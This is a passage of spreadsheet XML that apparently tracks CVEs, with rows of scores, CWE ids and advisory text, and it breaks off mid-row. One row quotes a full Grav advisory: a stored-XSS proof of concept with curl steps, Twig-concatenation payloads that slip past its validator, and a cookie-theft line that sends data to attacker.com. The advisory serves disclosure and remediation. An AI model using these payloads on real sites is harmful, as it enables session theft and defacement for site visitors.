      <c r="L1222" s="5" t="inlineStr"/>
      <c r="M1222" s="5" t="inlineStr"/>
      <c r="N1222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1222" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1222" s="5" t="inlineStr"/>
      <c r="Q1222" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="R1222" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in a2ui-project a2ui 0.9/0.9.1. This issue affects the function updateComponents of the file basic_functions.ts of the component Update Components. Executing a manipulation can lead to resource consumption. The attack can be launched remotely. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92356</t>
        </is>
      </c>
    </row>
    <row r="1223">
      <c r="A1223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92361</t>
        </is>
      </c>
      <c r="D1223" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1223" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1223" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1223" s="5" t="inlineStr"/>
      <c r="H1223" s="5" t="inlineStr"/>
      <c r="I1223" s="5" t="inlineStr"/>
      <c r="J1223" s="5" t="inlineStr"/>
      <c r="K1223" s="5" t="inlineStr"/>
      <c r="L1223" s="5" t="inlineStr"/>
      <c r="M1223" s="5" t="inlineStr"/>
      <c r="N1223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1223" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1223" s="5" t="inlineStr"/>
      <c r="Q1223" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="R1223" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in ag-ui-protocol ag-ui 1.0. This affects an unknown function of the file sdks/community/go/pkg/client/sse/client.go of the component SSE Client. Such manipulation leads to resource consumption. The attack can be executed remotely. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="S1223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92361</t>
        </is>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92461</t>
        </is>
      </c>
      <c r="D1224" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1224" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1224" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1224" s="5" t="inlineStr"/>
      <c r="H1224" s="5" t="inlineStr"/>
      <c r="I1224" s="5" t="inlineStr"/>
      <c r="J1224" s="5" t="inlineStr"/>
      <c r="K1224" s="5" t="inlineStr"/>
      <c r="L1224" s="5" t="inlineStr"/>
      <c r="M1224" s="5" t="inlineStr"/>
      <c r="N1224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1224" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1224" s="5" t="inlineStr"/>
      <c r="Q1224" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1224" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 contains a missing authorization vulnerability in the GET /admin-api/crm/flow/flow-users endpoint that allows any logged-in back-office user to access approval workflow data. Attackers can retrieve approval chain topology, step ordering, approver identifiers, and personal information including login names, nicknames, departments, email addresses, mobile numbers and last login IP addresses.</t>
        </is>
      </c>
      <c r="S1224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92461</t>
        </is>
      </c>
    </row>
    <row r="1225">
      <c r="A1225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92475</t>
        </is>
      </c>
      <c r="D1225" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1225" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1225" s="5" t="inlineStr"/>
      <c r="H1225" s="5" t="inlineStr"/>
      <c r="I1225" s="5" t="inlineStr"/>
      <c r="J1225" s="5" t="inlineStr"/>
      <c r="K1225" s="5" t="inlineStr"/>
      <c r="L1225" s="5" t="inlineStr"/>
      <c r="M1225" s="5" t="inlineStr"/>
      <c r="N1225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1225" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1225" s="5" t="inlineStr"/>
      <c r="Q1225" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="R1225" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in GPAC 26.08-DEV. This impacts the function wait_for_header_and_parse of the file src/utils/downloader.c. This manipulation of the argument Content-Range causes out-of-bounds read. The attack requires local access. The exploit has been made available to the public and could be used for attacks. Upgrading to version abi-16.26 will fix this issue. Patch name: c74a3065038ede35c1c7b75fa493a69ef6bcdb84. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S1225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92475</t>
        </is>
      </c>
    </row>
    <row r="1226">
      <c r="A1226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92565</t>
        </is>
      </c>
      <c r="D1226" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1226" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1226" s="5" t="inlineStr"/>
      <c r="H1226" s="5" t="inlineStr"/>
      <c r="I1226" s="5" t="inlineStr"/>
      <c r="J1226" s="5" t="inlineStr"/>
      <c r="K1226" s="5" t="inlineStr"/>
      <c r="L1226" s="5" t="inlineStr"/>
      <c r="M1226" s="5" t="inlineStr"/>
      <c r="N1226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1226" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1226" s="5" t="inlineStr"/>
      <c r="Q1226" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="R1226" s="5" t="inlineStr">
        <is>
          <t>Rallly before 4.15.0 contains an information disclosure vulnerability in the polls.get tRPC procedure that returns scheduled-event invitee names and email addresses to unauthenticated callers. Attackers can access a poll's urlId from public invite links to retrieve sensitive invitee information regardless of privacy settings.</t>
        </is>
      </c>
      <c r="S1226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92565</t>
        </is>
      </c>
    </row>
    <row r="1227">
      <c r="A1227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92568</t>
        </is>
      </c>
      <c r="D1227" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1227" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1227" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1227" s="5" t="inlineStr"/>
      <c r="H1227" s="5" t="inlineStr"/>
      <c r="I1227" s="5" t="inlineStr"/>
      <c r="J1227" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K1227" s="5" t="inlineStr"/>
      <c r="L1227" s="5" t="inlineStr"/>
      <c r="M1227" s="5" t="inlineStr"/>
      <c r="N1227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1227" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1227" s="5" t="inlineStr"/>
      <c r="Q1227" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1227" s="5" t="inlineStr">
        <is>
          <t>MLRun through 1.11.0 contains a server-side request forgery vulnerability in the WebhookNotification handler that allows authenticated users to make the API server send arbitrary HTTP requests to internal addresses. Attackers can update a run with a malicious webhook notification that executes when the run reaches a terminal state, enabling requests to internal services, Kubernetes APIs, or cloud metadata endpoints from within the cluster.</t>
        </is>
      </c>
      <c r="S1227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92568</t>
        </is>
      </c>
    </row>
    <row r="1228">
      <c r="A1228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92803</t>
        </is>
      </c>
      <c r="D1228" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1228" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1228" s="5" t="inlineStr"/>
      <c r="H1228" s="5" t="inlineStr"/>
      <c r="I1228" s="5" t="inlineStr"/>
      <c r="J1228" s="5" t="inlineStr"/>
      <c r="K1228" s="5" t="inlineStr"/>
      <c r="L1228" s="5" t="inlineStr"/>
      <c r="M1228" s="5" t="inlineStr"/>
      <c r="N1228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1228" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1228" s="5" t="inlineStr"/>
      <c r="Q1228" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1228" s="5" t="inlineStr">
        <is>
          <t>LibreTranslate through 1.9.6 omits the access_check decorator from the download_file route, allowing unauthenticated access to translated files. Attackers can bypass API key requirements and abuse ban lists to download files without authentication on protected instances.</t>
        </is>
      </c>
      <c r="S1228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92803</t>
        </is>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1229" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9338</t>
        </is>
      </c>
      <c r="D1229" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1229" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1229" s="5" t="inlineStr"/>
      <c r="H1229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1229" s="5" t="inlineStr"/>
      <c r="J1229" s="5" t="inlineStr">
        <is>
          <t>ibm:websphere</t>
        </is>
      </c>
      <c r="K1229" s="5" t="inlineStr">
        <is>
          <t>ibm:websphere_application_server</t>
        </is>
      </c>
      <c r="L1229" s="5" t="inlineStr"/>
      <c r="M1229" s="5" t="inlineStr"/>
      <c r="N1229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1229" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1229" s="5" t="inlineStr"/>
      <c r="Q1229" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1229" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to trigger excessive resource consumption, potentially leading to reduced availability of the affected service.</t>
        </is>
      </c>
      <c r="S1229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9338</t>
        </is>
      </c>
    </row>
    <row r="1230">
      <c r="A1230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1230" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19280</t>
        </is>
      </c>
      <c r="D1230" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="E1230" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1230" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1230" s="5" t="inlineStr"/>
      <c r="H1230" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1230" s="5" t="inlineStr"/>
      <c r="J1230" s="5" t="inlineStr"/>
      <c r="K1230" s="5" t="inlineStr"/>
      <c r="L1230" s="5" t="inlineStr"/>
      <c r="M1230" s="5" t="inlineStr"/>
      <c r="N1230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1230" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1230" s="5" t="inlineStr"/>
      <c r="Q1230" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R1230" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a denial of service as a result of a buffer overflow in a PASE process. An authenticated attacker could leverage this to terminate their own process.</t>
        </is>
      </c>
      <c r="S1230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19280</t>
        </is>
      </c>
    </row>
    <row r="1231">
      <c r="A1231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2380</t>
        </is>
      </c>
      <c r="D1231" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1231" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1231" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1231" s="5" t="inlineStr"/>
      <c r="H1231" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1231" s="5" t="inlineStr"/>
      <c r="J1231" s="5" t="inlineStr"/>
      <c r="K1231" s="5" t="inlineStr"/>
      <c r="L1231" s="5" t="inlineStr"/>
      <c r="M1231" s="5" t="inlineStr"/>
      <c r="N1231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1231" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1231" s="5" t="inlineStr"/>
      <c r="Q1231" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="R1231" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with OpenConfig-related services (i.e., gNMI, gNSI, RESTCONF and NETCONF), sensitive requests and responses may be unintentionally logged. These may be stored on the local EOS device or recorded on remote accounting servers. Note that gRPC-based streaming via Streaming Telemetry Agent to CloudVision is not affected by this vulnerability.
Examples of sensitive information include:
- Sensitive CLI commands (e.g., "username bob secret myPass")
- Sensitive OpenConfig YANG leafs (e.g., "system/aaa/global/tacacs/config/secret-key")
This issue was discovered internally by Arista, and the company is not aware of any malicious exploitation of this vulnerability in customer networks.</t>
        </is>
      </c>
      <c r="S1231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2380</t>
        </is>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1232" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61453</t>
        </is>
      </c>
      <c r="D1232" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1232" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1232" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1232" s="5" t="inlineStr"/>
      <c r="H1232" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1232" s="5" t="inlineStr"/>
      <c r="J1232" s="5" t="inlineStr"/>
      <c r="K1232" s="5" t="inlineStr"/>
      <c r="L1232" s="5" t="inlineStr">
        <is>
          <t>composer:getgrav/grav</t>
        </is>
      </c>
      <c r="M1232" s="5" t="inlineStr">
        <is>
          <t>2.0.1</t>
        </is>
      </c>
      <c r="N1232" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1232" s="5" t="inlineStr"/>
      <c r="P1232" s="5" t="inlineStr"/>
      <c r="Q1232" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-184, CWE-1336</t>
        </is>
      </c>
      <c r="R1232" s="5" t="inlineStr">
        <is>
          <t>## Summary
The XSS blueprint validator (`Security::detectXss()`) runs on the **raw page content before Twig processing**. An attacker can use Twig's string concatenation operator (`~`) to dynamically construct an event handler name at render time. The validator sees `{{ "on" ~ "error" }}` - a harmless Twig expression - and allows the content. After Twig processes the template, the output contains `&lt;img src=1 onerror=alert(1)&gt;` which is rendered via `{{ content|raw }}` and executes in the victim's browser.
---
## Details
**The two-stage attack** exploits the separation between validation and rendering:
**Stage 1 - what the XSS validator sees** (raw page content):
```twig
{% set x = "on" ~ "error" %}
&lt;img src=1 {{ x }}=alert(document.domain)&gt;
```
The `detectXss()` function scans this string. The `on_events` regex looks for `&lt;[^&gt;]*?[\s\x00-\x20\"\'\/](on\s*[a-z]+|xmlns)\s*=` inside HTML tags. In `{{ x }}`, the `{` character is not in the boundary set `[\s\x00-\x20\"\'\/]`, and `x` is not `on`. **No match - passes validation.**
**Stage 2 - what Twig produces** (after rendering):
```html
&lt;img src=1 onerror=alert(document.domain)&gt;
```
The validator never re-inspects Twig output. The theme template renders this via `{{ page.content|raw }}` (confirmed in `quark2/templates/default.html.twig:5`), so no auto-escaping occurs.
**Why `{% set %}` and `~` are allowed** - `system/config/security.yaml:125-145`:
```yaml
allowed_tags:
  - set          # ← allows variable assignment
  ...
```
The `~` operator is a core Twig operator for string concatenation (like `.` in PHP). It is not a function, filter, or tag — it is always available and not gated by the sandbox.
**The same technique bypasses the `dangerous_tags` blocklist** - any blocked tag name can be reconstructed:
```twig
&lt;s{{"c"~"r"~"i"~"p"~"t"}}&gt;alert(1)&lt;/s{{"c"~"r"~"i"~"p"~"t"}}&gt;
{# XSS validator sees: &lt;s{{...}}&gt; - no &lt;script&gt; tag detected
   Twig output: &lt;script&gt;alert(1)&lt;/script&gt; #}
```
**Also bypasses the `invalid_protocols` check**:
```twig
&lt;a href="{{"java"~"script"}}:alert(1)"&gt;click&lt;/a&gt;
{# Validator sees: href="{{...}}" - no "javascript:" protocol detected #}
```
---
## Proof of Concept
### Prerequisites
1. `twig_content.process_enabled: true` set by admin
2. `api.pages.write` permission (page creation)
### Step 1 - Obtain JWT token (any user with page write access)
```bash
JWT=$(curl -s http://127.0.0.1/grav/api/v1/auth/token \
  -X POST -H "Content-Type: application/json" \
  -d '{"username":"user","password":"pass"}' \
  | python3 -c "import json,sys; print(json.load(sys.stdin)['data']['access_token'])")
```
### Step 2 - Create page with Twig XSS payload
```bash
curl -s http://127.0.0.1/grav/api/v1/pages -X POST \
  -H "Authorization: Bearer $JWT" -H "Content-Type: application/json" \
  -d '{
    "title": "xss-page",
    "folder": "xss-page",
    "route": "/xss-page",
    "template": "default",
    "header": {"title": "xss", "process": {"markdown": false}},
    "content": "{% set x = \"on\" ~ \"error\" %}&lt;img src=1 {{ x }}=alert(document.domain)&gt;"
  }'
```
**Result**: `201 Created` - XSS validator passes because it sees `{{ x }}`, not `onerror`.
### Step 3 - Visit page → XSS fires
```bash
curl -s http://127.0.0.1/grav/xss-page | grep -oP '&lt;img[^&gt;]*&gt;'
# Output: &lt;img src=1 onerror=alert(document.domain)&gt;
```
Open in browser: `http://127.0.0.1/grav/xss-page` - `alert(document.domain)` fires.
&lt;img width="1842" height="996" alt="image" src="https://github.com/user-attachments/assets/eedd2555-266e-41fc-a461-c56631b8a588" /&gt;
&lt;img width="1346" height="263" alt="image" src="https://github.com/user-attachments/assets/b42b4ba3-4b8c-40a3-8fc3-62f961835aef" /&gt;
#### From a low-level user
Also From a low-level user normal script such as `&lt;img src=1 onerror=alert(1)&gt;` this is being blocked by the restriction.
&lt;img width="1849" height="980" alt="image" src="https://github.com/user-attachments/assets/f1503d4a-7daf-4237-b155-22801b961b57" /&gt;
But with payloads such as &lt;a href="{{"java"~"script"}}:alert(1)"&gt;click&lt;/a&gt; proves that the we can bypass the blueprint restrictions and upload malicious script to it
&lt;img width="1841" height="1009" alt="image" src="https://github.com/user-attachments/assets/60af8cf8-840a-4b9c-84ba-6f89355035fd" /&gt;
&lt;img width="1524" height="390" alt="image" src="https://github.com/user-attachments/assets/201991b7-3d56-4d85-9bbc-17a63b9cb770" /&gt;
### Alternative payloads (all bypass the validator)
| Payload | Twig Source | After Twig | Triggers |
|---------|------------|------------|----------|
| Event handler | `&lt;img src=1 {{"on"~"error"}}=alert(1)&gt;` | `&lt;img src=1 onerror=alert(1)&gt;` | Image load fails |
| Script tag | `&lt;s{{"c"~"r"~"i"~"p"~"t"}}&gt;alert(1)&lt;/s{{"c"~"r"~"i"~"p"~"t"}}&gt;` | `&lt;script&gt;alert(1)&lt;/script&gt;` | Immediately |
| Protocol bypass | `&lt;a href="{{"java"~"script"}}:alert(1)"&gt;click&lt;/a&gt;` | `&lt;a href="javascript:alert(1)"&gt;click&lt;/a&gt;` | On click |
| Iframe onload | `&lt;i{{"f"~"r"~"a"~"m"~"e"}} {{"on"~"load"}}=alert(1)&gt;` | `&lt;iframe onload=alert(1)&gt;` | Page load |
| Details toggle | `&lt;details open {{"on"~"toggle"}}=alert(1)&gt;` | `&lt;details open ontoggle=alert(1)&gt;` | Page load |
| Cookie theft | `&lt;img src=1 {{"on"~"error"}}=fetch("https://attacker.com/?c="+document.cookie)&gt;` | `&lt;img src=1 onerror=fetch(...)&gt;` | Image load fails |
### Admin preview caveat
The Admin2 SPA renders page previews inside a **sandboxed iframe**:
```html
&lt;iframe sandbox="allow-same-origin allow-scripts allow-forms"&gt;&lt;/iframe&gt;
```
`allow-modals` is **not** set - `alert()` is silenced in the admin preview. Use `fetch()`, `document.write()`, or DOM manipulation payloads to prove execution in the admin panel. The frontend page (no iframe) has no such restriction - `alert()` fires directly.
---
## Impact
Once the Twig content master gate is enabled by an administrator, **any user with page write access** can inject stored XSS into page content that executes for all visitors. The attack:
- **Bypasses all four XSS validator regexes** (`on_events`, `invalid_protocols`, `dangerous_tags`, `html_inline_styles`)
- **Bypasses the dangerous tag blocklist** (reconstructs `&lt;script&gt;`, `&lt;iframe&gt;`, `&lt;svg&gt;`, etc.)
- **Bypasses the invalid protocol blocklist** (reconstructs `javascript:`, `data:`)
- **Persists** across page edits (stored in page content file)
- **Executes** for every visitor to the page
An attacker can steal session cookies, perform actions as the victim, or deface the site.
---
## Remediation
### Option A - Re-run the XSS validator on Twig output
After `Twig::processPage()` renders the content, run the XSS validator on the **output** before it is cached and served:
```php
// In Twig::processPage(), after rendering
$rendered = $twig-&gt;render($name, $context);
$result = Security::detectXss($rendered);
if ($result !== null) {
    // Log and sanitize or block
    Security::logTwigSandboxViolation('xss_output', $result, '', $route);
    return ''; // or return escaped version
}
```
### Option B - Disallow `~` and `{% set %}` in sandboxed content (too restrictive)
Removing string concatenation or variable assignment from the sandbox would break legitimate use cases (e.g., building dynamic class names, assembling URLs).
### Option C - Block dynamic attribute names in Twig output
Parse the Twig output for HTML and check if any event handler attributes were dynamically constructed. This is complex but comprehensive.
### Option D - Escape HTML in rendered Twig output
Wrap the rendered output with `htmlspecialchars()` unless explicitly marked safe. This is the Twig default behavior — the `|raw` filter in theme templates bypasses it. Consider removing `|raw` from default themes and requiring explicit `|raw` only for trusted content.</t>
        </is>
      </c>
      <c r="S1232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61453</t>
        </is>
      </c>
    </row>
    <row r="1233">
      <c r="A1233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61597</t>
        </is>
      </c>
      <c r="D1233" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1233" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1233" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1233" s="5" t="inlineStr"/>
      <c r="H1233" s="5" t="inlineStr"/>
      <c r="I1233" s="5" t="inlineStr"/>
      <c r="J1233" s="5" t="inlineStr"/>
      <c r="K1233" s="5" t="inlineStr"/>
      <c r="L1233" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M1233" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N1233" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O1233" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1233" s="5" t="inlineStr"/>
      <c r="Q1233" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1233" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, many djust built-in component template tags (`djust.components.templatetags.*`) render a developer/user-supplied URL into an `href` / `action` attribute, HTML-escaping it with `conditional_escape` but never validating the URL scheme. HTML escaping prevents attribute breakout but does not neutralize a `javascript:` URI (which needs no escapable characters), so a URL value of `javascript:alert(document.cookie)` lands verbatim in `&lt;a href="javascript:alert(document.cookie)"&gt;` and executes in the victim's session on click. Version 1.0.7 contains a fix. As a workaround, do not pass user-controllable URLs to the affected built-in component tags; pre-validate URL schemes in application code before binding them to component arguments.</t>
        </is>
      </c>
      <c r="S1233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61597</t>
        </is>
      </c>
    </row>
    <row r="1234">
      <c r="A1234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1234" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81566</t>
        </is>
      </c>
      <c r="D1234" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1234" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1234" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G1234" s="5" t="inlineStr"/>
      <c r="H1234" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1234" s="5" t="inlineStr"/>
      <c r="J1234" s="5" t="inlineStr"/>
      <c r="K1234" s="5" t="inlineStr"/>
      <c r="L1234" s="5" t="inlineStr"/>
      <c r="M1234" s="5" t="inlineStr"/>
      <c r="N1234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1234" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1234" s="5" t="inlineStr"/>
      <c r="Q1234" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1234" s="5" t="inlineStr">
        <is>
